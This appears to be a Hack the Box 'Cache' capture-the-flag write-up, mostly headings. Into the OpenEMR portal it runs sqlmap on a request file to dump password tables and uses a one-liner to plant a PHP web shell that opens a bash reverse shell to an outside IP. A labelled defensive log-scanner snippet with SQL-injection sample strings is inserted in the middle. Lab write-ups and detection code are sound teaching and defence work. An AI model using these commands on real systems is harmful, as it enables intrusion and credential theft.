Hack the Box: Cache

Cache

User

Recon

Nmap scan
Main site
Login page
Credentials in js file
net.html
OpenEMR login page

Foothold

OpenEMR version
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page and modifying the requested URL to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
--snip--
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
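As a defender's counterpart to the sqlmap run above, this added example (not part of the original write-up) scans web access logs for portal requests whose `catid` value is not a plain integer. The Apache combined log format, the integer-only expectation for `catid`, and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format (not taken from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2020:10:00:01 +0000] "GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2020:10:00:07 +0000] "GET /portal/find_appt_popup_user.php?catid=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2020:10:00:08 +0000] "GET /portal/find_appt_popup_user.php?catid=1+UNION+SELECT+NULL--+- HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2020:10:00:09 +0000] "GET /portal/index.php?site=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client IP, request target and status code of a GET/POST log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')
INT_RE = re.compile(r"\d{1,10}")  # what a legitimate numeric id looks like


def suspicious_requests(log_text, prefix="/portal/", int_params=("catid",)):
    """Return (ip, path, param, decoded_value, status) for non-integer id values.

    The User-Agent is deliberately ignored: a replayed request file such as the
    one above carries the browser's own User-Agent header.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.startswith(prefix):
            continue
        # parse_qs percent-decodes values and turns '+' into a space
        query = parse_qs(url.query, keep_blank_values=True)
        for name in int_params:
            for value in query.get(name, []):
                if not INT_RE.fullmatch(value):
                    hits.append((ip, url.path, name, value, int(status)))
    return hits


def offenders(log_text):
    """Count suspicious requests per client IP, for alert thresholds."""
    return Counter(hit[0] for hit in suspicious_requests(log_text))


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer check, applied server-side before the value reaches a query, is the corresponding input-validation control.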
Password hash for openmr_admin
Reversing the password
Admin interface
Webshell
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/443 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php

User flag

Reverse shell
User flag

Root

User luffy

Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy

Docker privilege escalation

Listing local docker images
Root flag

Tellico Lungrevink